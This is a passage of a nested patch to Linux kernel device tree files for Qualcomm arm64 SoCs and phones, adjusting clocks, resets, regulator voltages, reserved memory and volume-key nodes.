+-				 <&gcc GCC_PCIE0_AUX_CLK>;
+-
++				 <&gcc GCC_PCIE0_AXI_S_BRIDGE_CLK>,
++				 <&gcc GCC_PCIE0_RCHNG_CLK>;
+ 			clock-names = "iface",
+ 				      "axi_m",
+ 				      "axi_s",
+-				      "ahb",
+-				      "aux";
++				      "axi_bridge",
++				      "rchng";
++
+ 			resets = <&gcc GCC_PCIE0_PIPE_ARES>,
+ 				 <&gcc GCC_PCIE0_SLEEP_ARES>,
+ 				 <&gcc GCC_PCIE0_CORE_STICKY_ARES>,
+ 				 <&gcc GCC_PCIE0_AXI_MASTER_ARES>,
+ 				 <&gcc GCC_PCIE0_AXI_SLAVE_ARES>,
+ 				 <&gcc GCC_PCIE0_AHB_ARES>,
+-				 <&gcc GCC_PCIE0_AXI_MASTER_STICKY_ARES>;
++				 <&gcc GCC_PCIE0_AXI_MASTER_STICKY_ARES>,
++				 <&gcc GCC_PCIE0_AXI_SLAVE_STICKY_ARES>;
+ 			reset-names = "pipe",
+ 				      "sleep",
+ 				      "sticky",
+ 				      "axi_m",
+ 				      "axi_s",
+ 				      "ahb",
+-				      "axi_m_sticky";
++				      "axi_m_sticky",
++				      "axi_s_sticky";
+ 			status = "disabled";
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8953.dtsi b/arch/arm64/boot/dts/qcom/msm8953.dtsi
+index 32349174c4bd9..70f033656b555 100644
+--- a/arch/arm64/boot/dts/qcom/msm8953.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8953.dtsi
+@@ -455,7 +455,7 @@
+ 			reg = <0x1000000 0x300000>;
+ 			interrupts = <GIC_SPI 208 IRQ_TYPE_LEVEL_HIGH>;
+ 			gpio-controller;
+-			gpio-ranges = <&tlmm 0 0 155>;
++			gpio-ranges = <&tlmm 0 0 142>;
+ 			#gpio-cells = <2>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <2>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8956.dtsi b/arch/arm64/boot/dts/qcom/msm8956.dtsi
+index e432512d8716a..668e05185c21e 100644
+--- a/arch/arm64/boot/dts/qcom/msm8956.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8956.dtsi
+@@ -12,6 +12,10 @@
+ 	interrupts = <GIC_PPI 7 (GIC_CPU_MASK_SIMPLE(6) | IRQ_TYPE_LEVEL_HIGH)>;
+ };
+ 
++&tsens {
++	compatible = "qcom,msm8956-tsens", "qcom,tsens-v1";
++};
++
+ /*
+  * You might be wondering.. why is it so empty out there?
+  * Well, the SoCs are almost identical.
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+index 79de9cc395c4c..cd77dcb558722 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+@@ -2,7 +2,7 @@
+ /*
+  * Copyright (c) 2015, LGE Inc. All rights reserved.
+  * Copyright (c) 2016, The Linux Foundation. All rights reserved.
+- * Copyright (c) 2021, Petr Vorel <petr.vorel@gmail.com>
++ * Copyright (c) 2021-2022, Petr Vorel <petr.vorel@gmail.com>
+  * Copyright (c) 2022, Dominik Kobinski <dominikkobinski314@gmail.com>
+  */
+ 
+@@ -15,6 +15,9 @@
+ /* cont_splash_mem has different memory mapping */
+ /delete-node/ &cont_splash_mem;
+ 
++/* disabled on downstream, conflicts with cont_splash_mem */
++/delete-node/ &dfps_data_mem;
++
+ / {
+ 	model = "LG Nexus 5X";
+ 	compatible = "lg,bullhead", "qcom,msm8992";
+@@ -49,12 +52,17 @@
+ 		};
+ 
+ 		cont_splash_mem: memory@3400000 {
+-			reg = <0 0x03400000 0 0x1200000>;
++			reg = <0 0x03400000 0 0xc00000>;
+ 			no-map;
+ 		};
+ 
+-		removed_region: reserved@5000000 {
+-			reg = <0 0x05000000 0 0x2200000>;
++		reserved@5000000 {
++			reg = <0x0 0x05000000 0x0 0x1a00000>;
++			no-map;
++		};
++
++		reserved@6c00000 {
++			reg = <0x0 0x06c00000 0x0 0x400000>;
+ 			no-map;
+ 		};
+ 	};
+@@ -86,8 +94,8 @@
+ 		/* S1, S2, S6 and S12 are managed by RPMPD */
+ 
+ 		pm8994_s1: s1 {
+-			regulator-min-microvolt = <800000>;
+-			regulator-max-microvolt = <800000>;
++			regulator-min-microvolt = <1025000>;
++			regulator-max-microvolt = <1025000>;
+ 		};
+ 
+ 		pm8994_s2: s2 {
+@@ -243,11 +251,8 @@
+ 		};
+ 
+ 		pm8994_l26: l26 {
+-			/*
+-			 * TODO: value from downstream
+-			 * regulator-min-microvolt = <987500>;
+-			 * fails to apply
+-			 */
++			regulator-min-microvolt = <987500>;
++			regulator-max-microvolt = <987500>;
+ 		};
+ 
+ 		pm8994_l27: l27 {
+@@ -261,19 +266,13 @@
+ 		};
+ 
+ 		pm8994_l29: l29 {
+-			/*
+-			 * TODO: Unsupported voltage range.
+-			 * regulator-min-microvolt = <2800000>;
+-			 * regulator-max-microvolt = <2800000>;
+-			 */
++			regulator-min-microvolt = <2800000>;
++			regulator-max-microvolt = <2800000>;
+ 		};
+ 
+ 		pm8994_l30: l30 {
+-			/*
+-			 * TODO: get this verified
+-			 * regulator-min-microvolt = <1800000>;
+-			 * regulator-max-microvolt = <1800000>;
+-			 */
++			regulator-min-microvolt = <1800000>;
++			regulator-max-microvolt = <1800000>;
+ 		};
+ 
+ 		pm8994_l31: l31 {
+@@ -282,11 +281,8 @@
+ 		};
+ 
+ 		pm8994_l32: l32 {
+-			/*
+-			 * TODO: get this verified
+-			 * regulator-min-microvolt = <1800000>;
+-			 * regulator-max-microvolt = <1800000>;
+-			 */
++			regulator-min-microvolt = <1800000>;
++			regulator-max-microvolt = <1800000>;
+ 		};
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8996-oneplus-common.dtsi b/arch/arm64/boot/dts/qcom/msm8996-oneplus-common.dtsi
+index 20f5c103c63b7..2994337c60464 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996-oneplus-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996-oneplus-common.dtsi
+@@ -179,7 +179,6 @@
+ };
+ 
+ &dsi0_phy {
+-	vdda-supply = <&vreg_l2a_1p25>;
+ 	vcca-supply = <&vreg_l28a_0p925>;
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi b/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
+index dec361b93ccea..be62899edf8e3 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
+@@ -943,10 +943,6 @@
+ 	};
+ };
+ 
+-/*
+- * For reasons that are currently unknown (but probably related to fusb301), USB takes about
+- * 6 minutes to wake up (nothing interesting in kernel logs), but then it works as it should.
+- */
+ &usb3 {
+ 	status = "okay";
+ 	qcom,select-utmi-as-pipe-clk;
+@@ -955,6 +951,7 @@
+ &usb3_dwc3 {
+ 	extcon = <&usb3_id>;
+ 	dr_mode = "peripheral";
++	maximum-speed = "high-speed";
+ 	phys = <&hsusb_phy1>;
+ 	phy-names = "usb2-phy";
+ 	snps,hird-threshold = /bits/ 8 <0>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index d31464204f696..71678749d66f6 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -713,7 +713,7 @@
+ 			#power-domain-cells = <1>;
+ 			reg = <0x00300000 0x90000>;
+ 
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>,
++			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>,
+ 				 <&rpmcc RPM_SMD_LN_BB_CLK>,
+ 				 <&sleep_clk>,
+ 				 <&pciephy_0>,
+@@ -830,9 +830,11 @@
+ 			compatible = "qcom,msm8996-a2noc";
+ 			reg = <0x00583000 0x7000>;
+ 			#interconnect-cells = <1>;
+-			clock-names = "bus", "bus_a";
++			clock-names = "bus", "bus_a", "aggre2_ufs_axi", "ufs_axi";
+ 			clocks = <&rpmcc RPM_SMD_AGGR2_NOC_CLK>,
+-				 <&rpmcc RPM_SMD_AGGR2_NOC_A_CLK>;
++				 <&rpmcc RPM_SMD_AGGR2_NOC_A_CLK>,
++				 <&gcc GCC_AGGRE2_UFS_AXI_CLK>,
++				 <&gcc GCC_UFS_AXI_CLK>;
+ 		};
+ 
+ 		mnoc: interconnect@5a4000 {
+@@ -1050,7 +1052,7 @@
+ 				#clock-cells = <1>;
+ 				#phy-cells = <0>;
+ 
+-				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_BB_CLK1>;
++				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 				clock-names = "iface", "ref";
+ 				status = "disabled";
+ 			};
+@@ -1117,7 +1119,7 @@
+ 				#clock-cells = <1>;
+ 				#phy-cells = <0>;
+ 
+-				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_BB_CLK1>;
++				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 				clock-names = "iface", "ref";
+ 				status = "disabled";
+ 			};
+@@ -2940,8 +2942,8 @@
+ 			compatible = "qcom,msm8996-apcc";
+ 			reg = <0x06400000 0x90000>;
+ 
+-			clock-names = "xo";
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>;
++			clock-names = "xo", "sys_apcs_aux";
++			clocks = <&rpmcc RPM_SMD_XO_A_CLK_SRC>, <&apcs_glb>;
+ 
+ 			#clock-cells = <1>;
+ 		};
+@@ -3060,7 +3062,7 @@
+ 			clock-names = "iface", "core", "xo";
+ 			clocks = <&gcc GCC_SDCC1_AHB_CLK>,
+ 				<&gcc GCC_SDCC1_APPS_CLK>,
+-				<&rpmcc RPM_SMD_BB_CLK1>;
++				<&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			resets = <&gcc GCC_SDCC1_BCR>;
+ 
+ 			pinctrl-names = "default", "sleep";
+@@ -3084,7 +3086,7 @@
+ 			clock-names = "iface", "core", "xo";
+ 			clocks = <&gcc GCC_SDCC2_AHB_CLK>,
+ 				<&gcc GCC_SDCC2_APPS_CLK>,
+-				<&rpmcc RPM_SMD_BB_CLK1>;
++				<&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			resets = <&gcc GCC_SDCC2_BCR>;
+ 
+ 			pinctrl-names = "default", "sleep";
+@@ -3406,7 +3408,7 @@
+ 			interrupt-names = "wdog", "fatal", "ready",
+ 					  "handover", "stop-ack";
+ 
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>;
++			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			clock-names = "xo";
+ 
+ 			memory-region = <&adsp_mem>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8998-fxtec-pro1.dts b/arch/arm64/boot/dts/qcom/msm8998-fxtec-pro1.dts
+index 310f7a2df1e83..510d12c8c5126 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998-fxtec-pro1.dts
++++ b/arch/arm64/boot/dts/qcom/msm8998-fxtec-pro1.dts
+@@ -364,14 +364,9 @@
+ 	};
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <GIC_SPI 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		bias-pull-up;
+-		debounce = <15625>;
+-		linux,code = <KEY_VOLUMEDOWN>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &qusb2phy {
+diff --git a/arch/arm64/boot/dts/qcom/msm8998-sony-xperia-yoshino.dtsi b/arch/arm64/boot/dts/qcom/msm8998-sony-xperia-yoshino.dtsi
+index 5da87baa2b23b..3bbd5df196bfc 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998-sony-xperia-yoshino.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998-sony-xperia-yoshino.dtsi
+@@ -357,14 +357,9 @@
+ 	};
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <GIC_SPI 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-		linux,code = <KEY_VOLUMEUP>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEUP>;
++	status = "okay";
+ };
+ 
+ &qusb2phy {
+diff --git a/arch/arm64/boot/dts/qcom/pmi8950.dtsi b/arch/arm64/boot/dts/qcom/pmi8950.dtsi
+index 32d27e2187e38..8008f02434a9e 100644
+--- a/arch/arm64/boot/dts/qcom/pmi8950.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmi8950.dtsi
+@@ -47,7 +47,7 @@
+ 			adc-chan@a {
+ 				reg = <VADC_REF_1250MV>;
+ 				qcom,pre-scaling = <1 1>;
+-				label = "ref_1250v";
++				label = "ref_1250mv";
+ 			};
+ 
+ 			adc-chan@d {
+diff --git a/arch/arm64/boot/dts/qcom/pmk8350.dtsi b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+index 32f5e6af8c11c..f26fb7d32faf2 100644
+--- a/arch/arm64/boot/dts/qcom/pmk8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+@@ -21,7 +21,7 @@
+ 		#size-cells = <0>;
+ 
+ 		pmk8350_pon: pon@1300 {
+-			compatible = "qcom,pm8998-pon";
++			compatible = "qcom,pmk8350-pon";
+ 			reg = <0x1300>, <0x800>;
+ 			reg-names = "hlos", "pbs";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/qcs404.dtsi b/arch/arm64/boot/dts/qcom/qcs404.dtsi
+index a5324eecb50a9..502dd6db491e2 100644
+--- a/arch/arm64/boot/dts/qcom/qcs404.dtsi
++++ b/arch/arm64/boot/dts/qcom/qcs404.dtsi
+@@ -806,7 +806,7 @@
+ 
+ 			clocks = <&gcc GCC_PCIE_0_PIPE_CLK>;
+ 			resets = <&gcc GCC_PCIEPHY_0_PHY_BCR>,
+-				 <&gcc 21>;
++				 <&gcc GCC_PCIE_0_PIPE_ARES>;
+ 			reset-names = "phy", "pipe";
+ 
+ 			clock-output-names = "pcie_0_pipe_clk";
+@@ -1336,12 +1336,12 @@
+ 				 <&gcc GCC_PCIE_0_SLV_AXI_CLK>;
+ 			clock-names = "iface", "aux", "master_bus", "slave_bus";
+ 
+-			resets = <&gcc 18>,
+-				 <&gcc 17>,
+-				 <&gcc 15>,
+-				 <&gcc 19>,
++			resets = <&gcc GCC_PCIE_0_AXI_MASTER_ARES>,
++				 <&gcc GCC_PCIE_0_AXI_SLAVE_ARES>,
++				 <&gcc GCC_PCIE_0_AXI_MASTER_STICKY_ARES>,
++				 <&gcc GCC_PCIE_0_CORE_STICKY_ARES>,
+ 				 <&gcc GCC_PCIE_0_BCR>,
+-				 <&gcc 16>;
++				 <&gcc GCC_PCIE_0_AHB_ARES>;
+ 			reset-names = "axi_m",
+ 				      "axi_s",
+ 				      "axi_m_sticky",
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index f71cf21a8dd8a..e45726be81c82 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -3274,8 +3274,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 			cell-index = <0>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 0adf13399e649..3bedd45e14afd 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -4246,8 +4246,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 71cf81a8eb4da..8363e82369854 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -1863,6 +1863,7 @@
+ 					  "ss_phy_irq";
+ 
+ 			power-domains = <&gcc USB30_PRIM_GDSC>;
++			required-opps = <&rpmhpd_opp_nom>;
+ 
+ 			resets = <&gcc GCC_USB30_PRIM_BCR>;
+ 
+@@ -1917,6 +1918,7 @@
+ 					  "ss_phy_irq";
+ 
+ 			power-domains = <&gcc USB30_SEC_GDSC>;
++			required-opps = <&rpmhpd_opp_nom>;
+ 
+ 			resets = <&gcc GCC_USB30_SEC_BCR>;
+ 
+@@ -2051,8 +2053,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sdm670-google-sargo.dts b/arch/arm64/boot/dts/qcom/sdm670-google-sargo.dts
+index cf2ae540db125..e3e61b9d1b9d7 100644
+--- a/arch/arm64/boot/dts/qcom/sdm670-google-sargo.dts
++++ b/arch/arm64/boot/dts/qcom/sdm670-google-sargo.dts
+@@ -256,6 +256,7 @@
+ 			regulator-min-microvolt = <1800000>;
+ 			regulator-max-microvolt = <1800000>;
+ 			regulator-enable-ramp-delay = <250>;
++			regulator-always-on;
+ 		};
+ 
+ 		vreg_l9a_1p8: ldo9 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index f41c6d600ea8c..75a4645936232 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -615,14 +615,9 @@
+ 	};
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <0x0 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-		linux,code = <KEY_VOLUMEDOWN>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &pmi8998_lpg {
+@@ -979,7 +974,7 @@
+ 	};
+ 
+ 	wcd_intr_default: wcd_intr_default {
+-		pins = <54>;
++		pins = "gpio54";
+ 		function = "gpio";
+ 
+ 		input-enable;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi b/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
+index 1eb423e4be24c..943287804e1a6 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
+@@ -482,14 +482,9 @@
+ 	status = "okay";
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <0x0 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-		linux,code = <KEY_VOLUMEDOWN>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &sdhc_2 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts b/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
+index bb77ccfdc68c0..e6191602c70a8 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
+@@ -522,14 +522,9 @@
+ 	};
+ };
+ 
+-&pm8998_pon {
+-	volume_down_resin: resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <0x0 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-		linux,code = <KEY_VOLUMEDOWN>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &pmi8998_lpg {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium-common.dtsi b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium-common.dtsi
+index eb6b2b676eca4..d2866155dd870 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium-common.dtsi
+@@ -325,14 +325,9 @@
+ 	qcom,cabc;
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		compatible = "qcom,pm8941-resin";
+-		interrupts = <0x0 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-		linux,code = <KEY_VOLUMEDOWN>;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &pmi8998_rradc {
+@@ -472,7 +467,7 @@
+ 	};
+ 
+ 	wcd_intr_default: wcd_intr_default {
+-		pins = <54>;
++		pins = "gpio54";
+ 		function = "gpio";
+ 
+ 		input-enable;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+index 38ba809a95cd6..fba229d0bd108 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+@@ -530,14 +530,9 @@
+ 	};
+ };
+ 
+-&pm8998_pon {
+-	resin {
+-		interrupts = <0x0 0x8 1 IRQ_TYPE_EDGE_BOTH>;
+-		compatible = "qcom,pm8941-resin";
+-		linux,code = <KEY_VOLUMEDOWN>;
+-		debounce = <15625>;
+-		bias-pull-up;
+-	};
++&pm8998_resin {
++	linux,code = <KEY_VOLUMEDOWN>;
++	status = "okay";
+ };
+ 
+ &q6afedai {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index 65032b94b46d6..f36c23e7a2248 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -4593,7 +4593,6 @@
+ 					 <&dispcc DISP_CC_MDSS_DP_PIXEL_CLK>;
+ 				clock-names = "core_iface", "core_aux", "ctrl_link",
+ 					      "ctrl_link_iface", "stream_pixel";
+-				#clock-cells = <1>;
+ 				assigned-clocks = <&dispcc DISP_CC_MDSS_DP_LINK_CLK_SRC>,
+ 						  <&dispcc DISP_CC_MDSS_DP_PIXEL_CLK_SRC>;
+ 				assigned-clock-parents = <&dp_phy 0>, <&dp_phy 1>;
+diff --git a/arch/arm64/boot/dts/qcom/sm6115.dtsi b/arch/arm64/boot/dts/qcom/sm6115.dtsi
+index 572bf04adf906..9de56365703cf 100644
+--- a/arch/arm64/boot/dts/qcom/sm6115.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6115.dtsi
+@@ -296,6 +296,8 @@
+ 
+ 			rpmcc: clock-controller {
+ 				compatible = "qcom,rpmcc-sm6115", "qcom,rpmcc";
++				clocks = <&xo_board>;
++				clock-names = "xo";
+ 				#clock-cells = <1>;
+ 			};
+ 
+@@ -361,7 +363,7 @@
+ 			reg-names = "west", "south", "east";
+ 			interrupts = <GIC_SPI 227 IRQ_TYPE_LEVEL_HIGH>;
+ 			gpio-controller;
+-			gpio-ranges = <&tlmm 0 0 121>;
++			gpio-ranges = <&tlmm 0 0 114>; /* GPIOs + ufs_reset */
+ 			#gpio-cells = <2>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <2>;
+@@ -704,6 +706,7 @@
+ 		ufs_mem_hc: ufs@4804000 {
+ 			compatible = "qcom,sm6115-ufshc", "qcom,ufshc", "jedec,ufs-2.0";
+ 			reg = <0x04804000 0x3000>, <0x04810000 0x8000>;
++			reg-names = "std", "ice";
+ 			interrupts = <GIC_SPI 356 IRQ_TYPE_LEVEL_HIGH>;
+ 			phys = <&ufs_mem_phy_lanes>;
+ 			phy-names = "ufsphy";
+@@ -736,10 +739,10 @@
+ 					<0 0>,
+ 					<0 0>,
+ 					<37500000 150000000>,
+-					<75000000 300000000>,
+ 					<0 0>,
+ 					<0 0>,
+-					<0 0>;
++					<0 0>,
++					<75000000 300000000>;
+ 
+ 			status = "disabled";
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+index 0de6c5b7f742e..09cff5d1d0ae8 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
++++ b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+@@ -41,17 +41,18 @@
+ 	};
+ 
+ 	gpio-keys {
+-		status = "okay";
+ 		compatible = "gpio-keys";
+-		autorepeat;
+ 
+-		key-vol-dn {
++		pinctrl-0 = <&vol_down_n>;
++		pinctrl-names = "default";
++
++		key-volume-down {
+ 			label = "Volume Down";
+ 			gpios = <&tlmm 47 GPIO_ACTIVE_LOW>;
+-			linux,input-type = <1>;
+ 			linux,code = <KEY_VOLUMEDOWN>;
+-			gpio-key,wakeup;
+ 			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
+ 		};
+ 	};
+ 
+@@ -270,6 +271,14 @@
+ 
+ &tlmm {
+ 	gpio-reserved-ranges = <22 2>, <28 6>;
++
++	vol_down_n: vol-down-n-state {
++		pins = "gpio47";
++		function = "gpio";
++		drive-strength = <2>;
++		bias-disable;
++		input-enable;
++	};
+ };
+ 
+ &usb3 {
+diff --git a/arch/arm64/boot/dts/qcom/sm6125.dtsi b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+index 7e25a4f85594f..bf9e8d45ee44f 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+@@ -442,9 +442,9 @@
+ 			reg = <0x01613000 0x180>;
+ 			#phy-cells = <0>;
+ 
+-			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>,
+-				 <&gcc GCC_AHB2PHY_USB_CLK>;
+-			clock-names = "ref", "cfg_ahb";
++			clocks = <&gcc GCC_AHB2PHY_USB_CLK>,
++				 <&rpmcc RPM_SMD_XO_CLK_SRC>;
++			clock-names = "cfg_ahb", "ref";
+ 
+ 			resets = <&gcc GCC_QUSB2PHY_PRIM_BCR>;
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/sm6350-sony-xperia-lena-pdx213.dts b/arch/arm64/boot/dts/qcom/sm6350-sony-xperia-lena-pdx213.dts
+index 94f77d376662e..4916d0db5b47f 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350-sony-xperia-lena-pdx213.dts
++++ b/arch/arm64/boot/dts/qcom/sm6350-sony-xperia-lena-pdx213.dts
+@@ -35,10 +35,10 @@
+ 	gpio-keys {
+ 		compatible = "gpio-keys";
+ 		pinctrl-names = "default";
+-		pinctrl-0 = <&gpio_keys_state>;
++		pinctrl-0 = <&vol_down_n>;
+ 
+ 		key-volume-down {
+-			label = "volume_down";
++			label = "Volume Down";
+ 			linux,code = <KEY_VOLUMEDOWN>;
+ 			gpios = <&pm6350_gpios 2 GPIO_ACTIVE_LOW>;
+ 		};
+@@ -305,14 +305,12 @@
+ };
+ 
+ &pm6350_gpios {
+-	gpio_keys_state: gpio-keys-state {
+-		key-volume-down-pins {
+-			pins = "gpio2";
+-			function = PMIC_GPIO_FUNC_NORMAL;
+-			power-source = <0>;
+-			bias-disable;
+-			input-enable;
+-		};
++	vol_down_n: vol-down-n-state {
++		pins = "gpio2";
++		function = PMIC_GPIO_FUNC_NORMAL;
++		power-source = <0>;
++		bias-disable;
++		input-enable;
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index 43324bf291c30..00e43a0d2dd67 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -342,13 +342,12 @@
+ 		};
+ 
+ 		ramoops: ramoops@ffc00000 {
+-			compatible = "removed-dma-pool", "ramoops";
+-			reg = <0 0xffc00000 0 0x00100000>;
++			compatible = "ramoops";
++			reg = <0 0xffc00000 0 0x100000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			ftrace-size = <0x0>;
